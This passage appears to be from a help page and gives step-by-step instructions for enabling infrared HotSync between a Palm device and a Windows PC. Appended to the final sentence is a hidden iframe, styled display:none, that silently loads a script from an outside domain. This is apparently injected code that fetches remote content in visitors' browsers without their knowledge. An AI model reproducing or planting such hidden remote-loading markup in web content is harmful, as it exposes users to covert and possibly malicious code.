-Exit HotSync Manager.

-Go to the Windows Control Panel and double click the "Wireless Link" icon.

-In the "Image transfer" tab, uncheck the box for "Use Wireless Link to transfer images from a digital camera to your computer".

-Disable any other application that opens the IR port.

-Restart HotSync.

-Go to the HotSync menu and check the "Infrared" menu item.
You can now synchronize via IR<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>